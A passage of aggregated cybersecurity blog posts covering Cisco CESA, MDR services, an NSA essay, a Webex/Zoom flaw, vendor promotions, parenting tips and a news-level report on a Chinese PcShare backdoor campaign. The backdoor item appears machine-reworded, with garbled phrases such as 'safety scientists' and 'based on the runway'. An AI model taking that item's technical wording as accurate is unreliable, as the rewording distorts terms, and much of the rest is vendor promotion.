  • Which devices and operating systems are in use in my endpoint environment?
  • Who is using each device and what are they doing with it?

It’s important to note that CESA is integrated into the Cisco Security infrastructure. CESA works together with network visibility from Cisco Stealthwatch and endpoint control from Cisco AMP for Endpoints. Additionally, Cisco Identity Services Engine (ISE) is used to quarantine users when identified as suspicious. These integrations serve to further increase the security posture of the network.

Cisco’s CSIRT team uses CESA

Many of our case studies come from our partners and customers, but this time our Cisco infosec team put together a case study as they leveraged CESA within the Cisco organization. They used the solution to collect and analyze the data generated by NVM across approximately 96,000 endpoints, and extract context such as user, device, application, location, and destination. The analysis of this data, from when the user is both on- and off-prem, helped Cisco infosec reduce incident investigation time from days to hours, while filling gaps in endpoint visibility.

“Splunk makes accessing the data from NVM, writing queries, and analyzing the data very easy,” said Cisco CSIRT’s Imran Islam.

Before CESA, the infosec team would struggle to determine which user is associated with what machine. And drilling down further was difficult if not impossible – from identifying machine to traffic; from traffic to the application or software process producing it; and then the traffic’s destination, whether inbound or outbound. It was reported by the Cisco infosec team that 80% of CESA use cases could not have been addressed by other technology.

Partnering to create a more secure network

At Cisco, we’re leading the industry in multi-vendor partnering solutions because we understand that collaboration is key to our customers having effective and efficient security across their networks — from endpoint to data center and cloud to campus. In fact, the Internet Engineering Task Force (IETF) recently standardized the XMPP-Grid security data exchange framework – based on Cisco Platform Exchange Grid (pxGrid) – which enables seamless collaboration and the sharing of information between security platforms from multiple vendors.

While no one product can achieve absolute security, no security solution exists in complete isolation. As security products become more interconnected, share context for threats, and participate in incident response, the risk of data breaches and security incidents is increasingly mitigated. This is why we believe in working so closely with our partners like Splunk through the Cisco Security Technical Alliance to integrate solutions that protect against emerging threats and improve customer security.

Splunk’s analytics-driven security solutions continue to serve as a perfect complement to Cisco Security. And we’re excited to see CESA deliver endpoint visibility and advanced threat detection for our customers. Cisco AnyConnect (Cisco’s VPN Client) is already deployed by over 150 million endpoints, and many customers are already running the Splunk console, which makes CESA a simple addition that will bring immense value for infosec’s ability to anticipate and stop endpoint threats before they manifest on the network.

If you don’t yet have these products, learn more about CESA and how you can add Cisco AnyConnect NVM and Splunk here. Stay tuned in the coming weeks for added CESA integration with Cisco Umbrella to enable enforcement at the domain level.

You can learn more about how Cisco infosec utilized CESA in this case study. 

Want to get started with CESA today? If you already have Splunk and AnyConnect, download and install the Cisco AnyConnect NVM App for Splunk from Splunkbase to create dashboards. Then, download and install the Cisco NVM Technology Add-On for Splunk from Splunkbase to bring NVM data into Splunk. Finally, turn on NVM telemetry in your AnyConnect environment as outlined in these tech docs.

Finally, be sure to follow me on Twitter and LinkedIn for the latest announcements from Cisco Security.

Sophos Managed Threat Response: An evolved approach to proactive security protection

In its 2019 market guide for managed detection and response (MDR) services, Gartner forecasted that by 2024, 25% of organizations will be using MDR services, up from less than 5% today. While the percentage might not end up as high as that, there’s no doubt that the demand for these services will increase rapidly, fueled by organizations’ inability to acquire, train and retain cybersecurity talent and to keep pace with the rising sophistication and complexity … More

The post Sophos Managed Threat Response: An evolved approach to proactive security protection appeared first on Help Net Security.

NSA on the Future of National Cybersecurity

Glenn Gerstell, the General Counsel of the NSA, wrote a long and interesting op-ed for the New York Times where he outlined a long list of cyber risks facing the US.

There are four key implications of this revolution that policymakers in the national security sector will need to address:

The first is that the unprecedented scale and pace of technological change will outstrip our ability to effectively adapt to it. Second, we will be in a world of ceaseless and pervasive cyberinsecurity and cyberconflict against nation-states, businesses and individuals. Third, the flood of data about human and machine activity will put such extraordinary economic and political power in the hands of the private sector that it will transform the fundamental relationship, at least in the Western world, between government and the private sector. Finally, and perhaps most ominously, the digital revolution has the potential for a pernicious effect on the very legitimacy and thus stability of our governmental and societal structures.

He then goes on to explain these four implications. It's all interesting, and it's the sort of stuff you don't generally hear from the NSA. He talks about technological changes causing social changes, and the need for people who understand that. (Hooray for public-interest technologists.) He talks about national security infrastructure in private hands, at least in the US. He talks about a massive geopolitical restructuring -- a fundamental change in the relationship between private tech corporations and government. He talks about recalibrating the Fourth Amendment (of course).

The essay is more about the problems than the solutions, but there is a bit at the end:

The first imperative is that our national security agencies must quickly accept this forthcoming reality and embrace the need for significant changes to address these challenges. This will have to be done in short order, since the digital revolution's pace will soon outstrip our ability to deal with it, and it will have to be done at a time when our national security agencies are confronted with complex new geopolitical threats.

Much of what needs to be done is easy to see -- developing the requisite new technologies and attracting and retaining the expertise needed for that forthcoming reality. What is difficult is executing the solution to those challenges, most notably including whether our nation has the resources and political will to effect that solution. The roughly $60 billion our nation spends annually on the intelligence community might have to be significantly increased during a time of intense competition over the federal budget. Even if the amount is indeed so increased, spending additional vast sums to meet the challenges in an effective way will be a daunting undertaking. Fortunately, the same digital revolution that presents these novel challenges also sometimes provides the new tools (A.I., for example) to deal with them.

The second imperative is we must adapt to the unavoidable conclusion that the fundamental relationship between government and the private sector will be greatly altered. The national security agencies must have a vital role in reshaping that balance if they are to succeed in their mission to protect our democracy and keep our citizens safe. While there will be good reasons to increase the resources devoted to the intelligence community, other factors will suggest that an increasing portion of the mission should be handled by the private sector. In short, addressing the challenges will not necessarily mean that the national security sector will become massively large, with the associated risks of inefficiency, insufficient coordination and excessively intrusive surveillance and data retention.

A smarter approach would be to recognize that as the capabilities of the private sector increase, the scope of activities of the national security agencies could become significantly more focused, undertaking only those activities in which government either has a recognized advantage or must be the only actor. A greater burden would then be borne by the private sector.

It's an extraordinary essay, less for its contents and more for the speaker. This is not the sort of thing the NSA publishes. The NSA doesn't opine on broad technological trends and their social implications. It doesn't publicly try to predict the future. It doesn't philosophize for 6000 unclassified words. And, given how hard it would be to get something like this approved for public release, I am left to wonder what the purpose of the essay is. Is the NSA trying to lay the groundwork for some policy initiative ? Some legislation? A budget request? What?

Charlie Warzel has a snarky response. His conclusion about the purpose:

He argues that the piece "is not in the spirit of forecasting doom, but rather to sound an alarm." Translated: Congress, wake up. Pay attention. We've seen the future and it is a sweaty, pulsing cyber night terror. So please give us money (the word "money" doesn't appear in the text, but the word "resources" appears eight times and "investment" shows up 11 times).

Susan Landau has a more considered response, which is well worth reading. She calls the essay a proposal for a moonshot (which is another way of saying "they want money"). And she has some important pushbacks on the specifics.

I don't expect the general counsel and I will agree on what the answers to these questions should be. But I strongly concur on the importance of the questions and that the United States does not have time to waste in responding to them. And I thank him for raising these issues in so public a way.

I agree with Landau.

Slashdot thread.

Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping

Cequence Security’s CQ Prime Threat Research Team discovered of a vulnerability in Cisco Webex and Zoom video conferencing platforms that potentially allows an attacker to enumerate or list and view active meetings that are not protected. The web conferencing market includes nearly three dozen vendors, some of whom may use similar meeting identification techniques. Although the CQ Prime team did not test each of these products, it is possible they could be susceptible as well. … More

The post Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping appeared first on Help Net Security.

Behavioral Analytics: What It Is Significant to Enterprise CyberSecurity

Do you want to know why behavioral analytics is vital to your enterprise? Are you even aware of what behavioral analytics is? What are the threats that it can detect quickly? Is your business in danger because of these threats?

As your company grows, you also need to add more assets and users to your enterprise network. Your business workflows undergo permanent changes as you add applications and databases. These upgrades mean more efficiency and collaboration that will result in more profitability. However, they also translate to more liabilities in terms of cybersecurity.

Each user, digital asset, or application can be an accessible doorway for hackers to invade your network. Also, faulty programming or malice perpetrated by any user can be a threat inside your business. In both cases, they can damage not only your network but your business processes as well.

What can you do? Monitoring every user can be frustrating and overwhelming. Even if you have the workforce, your IT security team can’t sustain the demand. Maintaining visibility on applications and users is close to impossible as your enterprise grows. Is there hope? Yes, there is!

Behavioral analytics can help solve your dilemma efficiently and magnificently. Let us take you to a thorough discussion about the topic.

The Basics of Behavioral Analytics

Behavioral Analytics analyzes patterns, activities, and trends of applications and users. It searches for any quirk or habit in your workflows. Moreover, each user has its profile in the system. For instance, your employee, Arthur, uses “Database A” four times a day. Because of next-generation technology, behavioral analytics can also notice the endpoint he uses when he requests for access. It can record and store them in a behavioral baseline.

This behavioral baseline can establish if Arthur, for example, requests for access to Database B for ten times on a specific workday. Moreover, it can determine if he makes the request thousands of miles from his usual location. Your cybersecurity perceives both behaviors that are outside of Arthur’s baseline.

Moreover, the cybersecurity can prohibit the requests for access and alert your IT security team so it can perform the necessary investigation. Arthur may be on a business trip on that day and need to access some information not relevant to his position. Your team can inform your cybersecurity about any unusual circumstances to allow Arthur to access the files.

This scenario can also demonstrate a possible hacking using Arthur’s credentials and accessing sensitive enterprise data. If this is the case, your IT security team can trigger incident response and terminate the hacking procedure to return the account to Arthur’s control. Moreover, it can fix any vulnerability that it may discover. It will also follow the same process for data traffic, movements, and requests for applications.

Behavioral analytics leverages statistical analysis and machine learning to monitor the behaviors of your users and search for anomalies.

Why Is Behavioral Analytics Critical to Cybersecurity?

Jack Vance wrote The Moon Moth. It is a famous short story in the science-fiction genre. The plot revolves around an imposter who can alter his appearance but can’t conceal his habits and tastes.

This observation is also valid for actual hackers. In a report by Centrify, a privileged access management supplier, 74% of business transgressions start with a weakened privileged account. Moreover, some studies show that at least 80% of breaches start with jeopardized accounts. It means that hackers prefer to disguise themselves using one of your users.

The damage caused by hackers can be overwhelming. In theory, these hackers can cause reputational loss and downtime, especially when they destroy your network. They can tamper your users’ baseline behaviors. They can try to cause damage, but whenever they do so, behavioral analytics can sanction the attempts and stop them. It can trigger a response from your IT team to intervene.

Moreover, this cybersecurity must-have relieve your IT security of too much burden. The group may feel overworked with threat hunting and user requests. A cybersecurity staffing crisis may occur if things get out of control. Fortunately, behavioral analytics operates automatically and helps your IT staff streamline its investigations to save time.

Deploying Business Analytics

For your organization, you must first consider your size, user base, IT infrastructure, industry, and applications. Furthermore, you must think of your future growth and scaling plans for the next five years. It must be your initial step in any selection of cybersecurity solutions. Unfortunately, many companies neglect it.

A majority of the enterprises don’t select optimal performance over speed. They choose the solution that can solve their immediate problems adequately. Because of this way of thinking, you’ll realize that your IT infrastructure has many solutions with serious integration issues.

If you want long-term solutions to your cybersecurity issues, you must consider behavioral analytics. If you’ve decided to incorporate it in your enterprise, your next step is choosing a robust Security Information and Event Management (SIEM) solution.

Why Do You Need a SIEM solution?

A SIEM solution is the next-generation version of our topic. It includes user and entity behavioral analytics (UEBA). Furthermore, you can avail of threat intelligence feeds to help you detect any modern or expanded threats quickly.

You may think that a SIEM solution is complicated. You’re right! Moreover, the system works as a tool for log management and analysis that adds a behavioral analysis layer. Cybersecurity recognizes that it can’t deflect 100% of threats because the digital perimeters can’t do it. However, with a SIEM system, you’re able to detect threats that can wreak havoc to your enterprise.

Hackers are everywhere and waiting for an opportunity to strike. If you want to monitor and stop them, you can do so with the next-generation analytics and cybersecurity capabilities. A SIEM solution with UEBA and other significant capabilities is an excellent strategy to catch these hackers. It prevents them from intruding and cause severe downtime, which can compromise your reputation to the business world.

The post Behavioral Analytics: What It Is Significant to Enterprise CyberSecurity appeared first on .

Assessing risk: Measuring the health of your infosec environment

There is an uncomfortable truth that many organizations are not conducting comprehensive assessments of their information security risk; or those that do aren’t getting much value out of assessment exercises — because they simply don’t know how. Given the massive amounts of data organizations hold, accurately assessing these risks is difficult. So is determining how to best control them once they are identified. That’s especially needed for businesses in highly regulated industries that can face … More

The post Assessing risk: Measuring the health of your infosec environment appeared first on Help Net Security.

Five questions every CEO should be asking about cybersecurity

Estimated reading time: 3 minutes

As the captain of the ship, the Chief Executive Officer (CEO) plays a very important role in how an enterprise addresses cybersecurity issues and concerns. When the CEO provides a buy-in towards making enterprise security safer, it trickles down as a new mindset for the entire organization.

The 9th Annual Cost of Cybercrime Study 2019 revealed a significant statistic – the average cost of cybercrime for an organization increased by $1.4 million to $13 million in 2019.

More than anything else, this is the most important statistic which illustrates why cybersecurity is one of the most important issues that a modern organization must deal with. It is no longer a question of IT or Information Security – it is a business issue as important as anything else which leaders need to deal with urgently.

But to create that mindset, what kind of questions should a CEO be asking? Here are five important ones:

  1. How prepared is the enterprise right now to handle cyber risks?

The CEO, as the most important leader in the company, must know and that too, in minute detail, about his company’s preparedness to current threats. The leadership must have detailed visibility of how the enterprise is dealing with these risks, what measures they are taking and also, what threats are slipping through the net. This question is the first starting point for the CEO and the answer to this question will provide a complete understanding of where the enterprise is currently placed when it comes to cybersecurity. On the basis of that, plans for the future can be made.

  1. Does the senior leadership buy into the current cybersecurity framework? If not, why?

CEOs head organizations but they can never be a one-person army. Great organizations surround CEOs with a team of competent leaders who come together to form one unified front. It is in the same way that a company’s senior leadership team comprising the C-suite must also showcase a united stand towards cybersecurity measures taken by the enterprise. This helps in better compliance and inculcation of a security-first mindset among employees. However, this is easier said than done and that is why a CEO must ask this question.

If the CEO finds out that this is not the case, the first step is to get the entire leadership team on board.

  1. What is our plan for responding to cybersecurity incidents? How regularly has it been tested?

Cybersecurity is not a zero-sum game – there is always a scope for malware to sneak through despite the best possible measures. This is why an Incident Response Plan comes in handy as it details the actions to be taken for different kind of incidents. The CEO must be aware of every intricate detail of this plan as in times of a crisis, they will need to show that they are in control. CEOs must also keep themselves abreast of how regularly this plan is tested so that they are aware of any shortcomings in it.

  1. Do the employees have a cybersecurity mindset?

Employees are the single biggest factor in cybersecurity preparedness for an enterprise. The CEO must be aware of the current culture of cybersecurity in the organization – are employees aware of the dangers that cyber threats may pose or do they still remain blissfully unaware? If the answer is the latter, the CEO must immediately put in place a plan to create a mindset of cybersecurity in the entire organization.

  1. How does the enterprise handle insider threats?

Cybersecurity is not always an external affair – in many cases, danger lurks within the enterprise in the form of insider threats and disgruntled employees. It is not just the InfoSec team that has to be aware of this  – the CEO must ask leading questions about this dangerous type of threat and the kind of the measures the company is taking to tackle this threat.

Creating a cybersecurity culture in an enterprise is not easy but investing in a strong enterprise solution goes a long way in protecting an organization from the varied threats that exist. Seqrite’s range of solutions enables security and greater productivity in the cybersecurity journey.  

The post Five questions every CEO should be asking about cybersecurity appeared first on Seqrite Blog.

38% of the Fortune 500 do not have a CISO

To uncover whether the world’s leading companies are committed to enhancing their cybersecurity initiatives, Bitglass researched the members of the 2019 Fortune 500 and analyzed public-facing information such as what is available on their websites. 77% of the Fortune 500 make no indication on their websites about who is responsible for their security strategy. Additionally, 52% do not have any language on their websites about how they protect the data of customers and partners (beyond … More

The post 38% of the Fortune 500 do not have a CISO appeared first on Help Net Security.

Email is an open door for malicious actors looking to exploit businesses

There’s an alarming scale of risks businesses are up against in a time when email is proving an open door for cybercriminals and malicious actors looking to disrupt, exploit and destroy businesses, according to Wire. The report is developed in collaboration with global poker champion and astrophysicist, Liv Boeree. P​oker is a game of making calculated, strategic decisions in high-stakes situations. As such, Liv is able to draw parallels between the poker table and the … More

The post Email is an open door for malicious actors looking to exploit businesses appeared first on Help Net Security.

BlackBerry launches BlackBerry Labs to develop cybersecurity solutions

BlackBerry Ltd. is looking to ramp up its cybersecurity research and development by today announcing the launch of a new business unit entitled BlackBerry Advanced Technology Development Labs (BlackBerry Labs).

The unit will be headed by BlackBerry’s chief technology officer, Charles Eagan, and will include a team of over 120 software developers, architects, researchers, product leads and security experts.

“The establishment of BlackBerry Labs is the latest in a series of strategic moves we’ve taken to ensure our customers are protected across all endpoints and verticals in the new IoT,” said Eagan in a press release. “Today’s cybersecurity industry is rapidly advancing and BlackBerry Labs will operate as its own business unit solely focused on innovating and developing the technologies of tomorrow that will be necessary for our sustained competitive success, from A to Z; Artificial Intelligence to Zero-Trust environments. We believe this highly experienced team will allow us to remain nimble, engaged and, above all else, proactive in our efforts to be the most trusted security software leader in the market.”

While the overarching scope will be researching and developing security solutions, BlackBerry said initial work will be specifically focused on machine learning approaches to security in partnership with the company’s existing Cylance, Enterprise, and QNX business units.

Our World in Transition and Our Future Demands

October is Cybersecurity Awareness Month and for me, it’s a time to reflect on where we’ve been and how far we’ve come, study the trends and challenges we face today, and look ahead to the next generation of opportunities facing not only the security community, but society at large.

In my more than 30 years in the security industry, it’s been interesting to see how technology has evolved and changed the world. Security started off as a ‘systems’ conversation. Now, technology touches everyone’s lives, and as a result, cybersecurity affects us all – individuals, businesses, cities, countries, our global community.

From Use to Reliance

During our lifetimes, we’ve shifted from using technology to, in very subtle ways, becoming reliant on it. Whether we realize it or not, these subtleties have made us dependent on technology. The notion of ‘always on’ access to data is highly disruptive to us when we don’t have it. Take maps for example: using a printed map is foreign to us today, and when the maps on our devices don’t work, we’re lost, literally.

When technology is unavailable, in many respects we feel ‘out of the loop’ and behind in knowing what’s going on. There’s a lagging indicator that says, ‘Now that we have access to current information, we always expect this level of connectivity – we depend on it.’ That reliance makes securing the data and the systems that deliver it to us that much more vital.

A Confluence of Change – All in Three Years

Since 2017, three major transitions have occurred that illustrate how complicated cybersecurity has become for us all globally. These transitions have caused security professionals to feel the pressure and scrutiny from a number of organizations that have upped their games. They’re having to catch up to a confluence of changes, all occurring at the same time:

1. Technology

Prior to 2017, IT predominantly built and ran an organization’s technology infrastructure, spending on security and hoping it works, relying on best-of-breed products, and managing it all reactively.

We all needed cybersecurity, but how could we net the best results – the greatest level of efficacy – from the solutions we purchased? Exactly how much value are we getting when spending on a solution? Is it all integrated as a best strategy or are we simply buying technology from the leading brand name or best advertised?

Today, leading IT teams build, buy and run security, use a ‘best-of-integrated’ architecture approach and emphasize visibility, controls, measures and proactive approaches to security that drive efficacy and value.

2. Laws, Regulations, and Customer Requirements

This transition shows the increasing influence that laws, regulations and customer requirements have on a technology or service provider to its clients, and in turn, to their customers, citizens, colleagues, families and friends.

The formalization of laws and regulations – from the EU-NIS Directive to GDPR to the Australian Government Protective Security Policy Framework to the California Consumer Privacy Act, to name a few – have driven greater scrutiny and reform. It’s accelerated substantially in a short period of time, from ‘do-it-yourself’ disharmonious regulations and rule, to a set of country, inter-country and international use standards.

Now corporate and government leaders across the international community are being held accountable. This transition from varying self-rule and self-regulation to accountability, breach reporting and disclosure highlights the implications of mishandling data and privacy through significant fines and executive firings.

In many respects, it’s been a long time coming. What’s interesting is that now that it’s here, it’s caught many off-guard – and it’s by no means slowing down.

3. Internal Oversight

When I started in InfoSec, security was mainly an engineering or computer science discipline. The security team was often avoided so that they couldn’t suppress innovation because of security concerns. The business was self-governing with inconsistent levels of oversight.

Today, internal reporting to and oversight by executive leadership, the CEO, the board of directors and shareholders are becoming standard practice to ensure proper governance. In part, it is a response to the regulatory landscape and the need for higher levels of accountability and oversight from within. It’s also based on the criticality of technology moving from something we use to something we rely on to deliver a service.

All three of these transitions came to the fore in a very short period of time to know how to effectively react, govern and solve for it. By the way, we’re all going through this and determining our own strategies to face the challenges, net the value they deliver, and understand how to be safe and secure in and around it all.

Our Future Demands

Today, there are about 4 billion internet users globally – all told about 10X of what it was in 2000. We’re in a world where everything is being connected and generating data. This will have significant impact on the next few years in particular and even more substantially into the future.

By next year, there will be about 200 billion devices ‘on air,’ which includes cars, telemetry in cities, sensors and a multitude of other connected devices. Two-hundred billion is almost an ephemeral number, but it’s not to be underestimated because the number of vendors creating IoT-connected technology is growing probably 3-4X every year than the prior year. That’s a trend that I don’t see slowing down any time soon.

By 2021, cybercrime is estimated to be a $6 trillion industry – a very profitable industry, though I don’t recommend it as a career choice. It does illustrate the depth and breadth of the challenge – that it’s an international and global issue that we all have to work together to solve because it’s something that we all face.

Raising the Bar for a More Secure Future

Governments and businesses globally are raising the bar to meet the challenge around product assurance, cloud assurance, IoT, lawful intercept, data protection, privacy and the like. Some 30-odd countries are writing or revising their cybersecurity strategies and each can have profound implications on how data is shared and how systems are built.

So, during Cybersecurity Awareness Month, consider what you can do to make the world more safe and secure, and take action. What can you do as individuals? How are you protecting yourself online and helping your business, colleagues, friends and family to do the same? Each individual act, when taken together, can move us all to a more secure future.

We’re not looking for headlines that show ‘good’ or ‘bad.’ We need trend lines that show that what we’re doing collectively is moving us all towards lower risk. As long as the trend line is going in the right direction, we’re doing what we need to do – and we must all do our part.

For governments, companies and individuals alike, Cisco’s Cybersecurity Awareness Month site offers events, activities and educational content, and ways to get involved. The Cisco Trust Center also offers resources to help you with security, data protection and privacy. Both feature links to security reports, videos, threat intelligence, thought leadership and more that will keep you informed.

McAfee Receives the 2019 Security Excellence Award From IoT Evolution

If you’re like most users, you’ve probably adopted several smart devices into your home over the last few years. Whether it be voice assistants, smart TVs, thermostats, or gaming systems, IoT devices help make our lives easier. But with greater connectivity also comes greater exposure to online threats. However, that doesn’t mean users should avoid using IoT technology altogether. With the help of smart security, users can feel safe and protected as they bring new gadgets into their lives. Solutions like McAfee Secure Home Platform, which is now the winner of the IoT Security Excellence Award, can help users connect with confidence.

Here at McAfee, we know smart security is more important now than ever before. That’s why we work tirelessly to ensure that our solutions provide consumers with the best protection possible. For example, McAfee Secure Home Platform provides automatic protection for the entire home network by automatically securing connected devices through a router with McAfee protection. It’s through the proactive evolution of our products that McAfee Secure Home Platform has received this 2019 IoT Security Excellence Award from IoT Evolution World, the leading publication covering IoT technologies.

The IoT Security Excellence Award celebrates the most innovative products and solutions in the world of IoT. It honors technology empowered by the new availability of information being deduced, inferred, and directly gathered from sensors, systems, and anything else that is supporting better business and personal decisions. Winners of this award are recognized for their innovation in gathering and managing information from connected devices that often are not associated with IoT.

“We are thrilled that McAfee Secure Home Platform has been recognized by IoT Evolution World as a recipient of the 2019 IoT Evolution Security Excellence Award. We continue to prioritize creating solutions that lead with ease of use and first-class protection, in order for consumers to best protect every connected device in their homes.” – Gary Davis, Chief Consumer Security Evangelist at McAfee.

As long as technology continues to evolve, so will the threat landscape. This is what drives us to keep developing leading solutions that help you and your loved ones connect with confidence. Solutions like McAfee Secure Home Platform are leading the charge in providing top home network security while still empowering users to enjoy their smart devices.

To stay updated on the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post McAfee Receives the 2019 Security Excellence Award From IoT Evolution appeared first on McAfee Blogs.

How long before quantum computers break encryption?

The verdict is in: quantum computing poses an existential threat to asymmetric cryptography algorithms like RSA and ECC that underpin practically all current Internet security. This comes straight from the National Academy of Science’s Committee on Technical Assessment of the Feasibility and Implications of Quantum Computing. The inevitable follow-up: OK, so how much time do we have before we’re living in a post-quantum world? The short answer is, nobody knows. That’s not for lack of … More

The post How long before quantum computers break encryption? appeared first on Help Net Security.

A proactive approach to cybersecurity requires the right tools, not more tools

The key challenge facing security leaders and putting their organizations at risk of breach is misplaced confidence that the abundance of technology investments they have made has strengthened their security posture, according to a study conducted by Forrester Consulting. The study surveyed over 250 senior security decision-makers in North America and Europe. Participants included CISO, CIO, IT and security VPs from organizations ranging from 3,000 to over 25,000 employees. Currently, security leaders employ a variety … More

The post A proactive approach to cybersecurity requires the right tools, not more tools appeared first on Help Net Security.

DevSecOps is emerging as the main methodology for securing cloud-native applications

Only 8 percent of companies are securing 75 percent or more of their cloud-native applications with DevSecOps practices today, with that number jumping to 68 percent of companies securing 75 percent or more of their cloud-native applications with DevSecOps practices in two years, according to ESG. The study results also revealed that API-related vulnerabilities are the top threat concern (63 percent of respondents) when it comes to organizations use of serverless. Overall, the study analyzed … More

The post DevSecOps is emerging as the main methodology for securing cloud-native applications appeared first on Help Net Security.

ThreatConnect Platform: Security insight for sound decision-making

In this interview, Jason Spies, VP of Engineering & Chief Architect, ThreatConnect, talks about the powerful features of the ThreatConnect Platform. Oftentimes, the ability for a product to support growth (scale effectively) is forgotten in lieu of a customer being dazzled by individual features or capabilities. Can you talk about the importance of technical considerations when it comes to a Platform scaling to support multiple teams and growing demands overtime? Bottom line, it’s a balance … More

The post ThreatConnect Platform: Security insight for sound decision-making appeared first on Help Net Security.

5 Digitally-Rich Terms to Define and Discuss with Your Kids

online privacy

Over the years, I’ve been the star of a number of sub-stellar parenting moments. More than once, I found myself reprimanding my kids for doing things that kids do — things I never stopped to teach them otherwise.

Like the time I reprimanded my son for not thanking his friend’s mother properly before we left a birthday party. He was seven when his etiquette deficit disorder surfaced. Or the time I had a meltdown because my daughter cut her hair off. She was five when she brazenly declared her scorn for the ponytail.

The problem: I assumed they knew.

Isn’t the same true when it comes to our children’s understanding of the online world? We can be quick to correct our kids when they fail to exercise the best judgment or handle a situation the way we think they should online.

But often what’s needed first is a parental pause to ask ourselves: Am I assuming they know? Have I taken the time to define and discuss the issue?

With that in mind, here are five digitally-rich terms dominating the online conversation. If possible, find a few pockets of time this week and start from the beginning — define the words, then discuss them with your kids. You may be surprised where the conversation goes.

5 digital terms that matter

Internet Privacy

Internet privacy is the personal privacy that every person is entitled to when they display, store, or provide information regarding themselves on the internet. 

Highlight: We see and use this word often but do our kids know what it means? Your personal information has value, like money. Guard it. Lock it down. Also, respect the privacy of others. Be mindful about accidentally giving away a friend’s information, sharing photos without permission, or sharing secrets. Remember: Nothing shared online (even in a direct message or private text) is private—nothing. Smart people get hacked every day.
Ask: Did you know that when you go online, websites and apps track your activity to glean personal information? What are some ways you can control that? Do you know why people want your data?
Act: Use privacy settings on all apps, turn off cookies in search engines, review privacy policies of apps, and create bullet-proof passwords.

Digital Wellbeing

Digital wellbeing (also called digital wellness) is an ongoing awareness of how social media and technology impacts our emotional and physical health.

Highlight: Every choice we make online can affect our wellbeing or alter our sense of security and peace. Focusing on wellbeing includes taking preventative measures, making choices, and choosing behaviors that build help us build a healthy relationship with technology. Improving one’s digital wellbeing is an on-going process.
Ask: What do you like to do online that makes you feel good about yourself? What kinds of interactions make you feel anxious, excluded, or sad? How much time online do you think is healthy?
Act:
Digital wellness begins at home. To help kids “curb the urge” to post so frequently, give them a “quality over quantity” challenge. Establish tech curfews and balance screen time to green time. Choose apps and products that include wellbeing features in their design. Consider security software that blocks inappropriate apps, filters disturbing content, and curbs screen time.

Media Literacy

Media literacy is the ability to access, analyze, evaluate, and create media in a variety of forms. It’s the ability to think critically about the messages you encounter.

Highlight: Technology has redefined media. Today, anyone can be a content creator and publisher online, which makes it difficult to discern the credibility of the information we encounter. The goal of media literacy curriculum in education is to equip kids to become critical thinkers, effective communicators, and responsible digital citizens.
Ask: Who created this content? Is it balanced or one-sided? What is the author’s motive behind it? Should I share this?  How might someone else see this differently?
Act: Use online resources such as Cyberwise to explore concepts such as clickbait, bias, psychographics, cyberethics, stereotypes, fake news, critical thinking/viewing, and digital citizenship. Also, download Google’s new Be Internet Awesome media literacy curriculum.

Empathy

Empathy is stepping into the shoes of another person to better understand and feel what they are going through.

Highlight: Empathy is a powerful skill in the online world. Empathy helps dissolve stereotypes, perceptions, and prejudices. According to Dr. Michelle Borba, empathetic children practice these nine habits that run contrary to today’s “selfie syndrome” culture. Empathy-building habits include moral courage, kindness, and emotional literacy. Without empathy, people can be “mean behind the screen” online. But remember: There is also a lot of people practicing empathy online who are genuine “helpers.” Be a helper.
Ask: How can you tell when someone “gets you” or understands what you are going through? How do they express that? Is it hard for you to stop and try to relate to what someone else is feeling or see a situation through their eyes? What thoughts or emotions get in your way?
Act:  Practice focusing outward when you are online. Is there anyone who seems lonely, excluded, or in distress? Offer a kind word, an encouragement, and ask questions to learn more about them. (Note: Empathy is an emotion/skill kids learn over time with practice and parental modeling).

Cyberbullying

Cyberbullying is the use of technology to harass, threaten, embarrass, shame, or target another person online.

Highlight: Not all kids understand the scope of cyberbullying, which can include spreading rumors, sending inappropriate photos, gossiping, subtweeting, and excessive messaging. Kids often mistake cyberbullying for digital drama and overlook abusive behavior. While kids are usually referenced in cyberbullying, the increase in adults involved in online shaming, unfortunately, is quickly changing that ratio.
Ask: Do you think words online can hurt someone in a way, more than words said face-to-face? Why? Have you ever experienced cyberbullying? Would you tell a parent or teacher about it? Why or why not?
Act: Be aware of changes in your child’s behavior and pay attention to his or her online communities. Encourage kids to report bullying (aimed at them or someone else). Talk about what it means to be an Upstander when bullied. If the situation is unresolvable and escalates to threats of violence, report it immediately to law enforcement.

We hope these five concepts spark some lively discussions around your dinner table this week. Depending on the age of your child, you can scale the conversation to fit. And don’t be scared off by eye rolls or sighs, parents. Press into the hard conversations and be consistent. Your voice matters in their noisy, digital world.

The post 5 Digitally-Rich Terms to Define and Discuss with Your Kids appeared first on McAfee Blogs.

Cylance Security Researchers Warn Technology Firms in Southeast Asia for Chinese Open –Source Backdoor

Attackings of technology businesses in Southeast Asia by a suspected Chinese threat actor employ a version of the open-source PcShare backdoor, safety scientists in BlackBerry Cylance warn.

The attackers also used a Trojan-made screen reader application, which replaces the built-in Windows “Easy Access” narrator function, mainly gaining distant control over the infected systems without the victim being required to steal credentials.

The Chinese open-source backdoor, PcShare, has been altered specifically for this campaign with extra C&C encryption and proxy bypass. In addition, the operators have removed from the code any unused features.

The malware is performed by DLL side-loading on the victim’s machine. Specifically, the backdoor is laid out by the lawful NVIDIA Smart Maximize Helper Host implementation, which safety scientists found to be a component of the NVIDIA GPU graphics systems.

After the original compromise, a number of instruments are used, many of which are based on software accessible to the general public on Chinese programming portals. One of these is a Trojan who uses Microsoft accessibility features to obtain SYSTEM access by trojanizing the executable Narrator.

The hackers used memory injection so the primary backdoor binary does not touch the disk and encoded payload based on the runway to prevent detection. The loader is configured in plain text, but the URL provided is not the true C&C address. It instead links to a remote file with C&C communication information.

While threat actors have used the same PcShare payload over multiple attacks, they often have modified the side-loaded DLL for each target, including the C&C IP addresses and victims identifiers, to update the configuration details.

The malware determines persistence by adding a record entry and generates mutexes so that only one example of the payload injection routine is running.

Backdoor features include distinct operating modes (such as SSH & Telnet, the automatic upgrade, upload and download mode), traffic compression using a personalized LZW algorithm, encrypted C&C communication using the PolarSSL library, and proxy authentication via local user credentials.

Malware remote management capacities include listing, creating, renaming and deleting files and directories; listing and killing procedures; editing registry keys and values; listing and manipulating service; enumeration and controlling windows; running binaries; uploading extra files to C&C or URL; uploading files to the C&C; spawning command-line shell; navigating to the message boxes; viewing URLs;

The fake narrator app used by the threat actor is not trying to substitute the lawful app, but instead creates a copy to copy the user interface of the narrator. The trojanized application is supplied after attackers obtain administrative rights on the scheme and provide the computer with SYSTEM-level access.

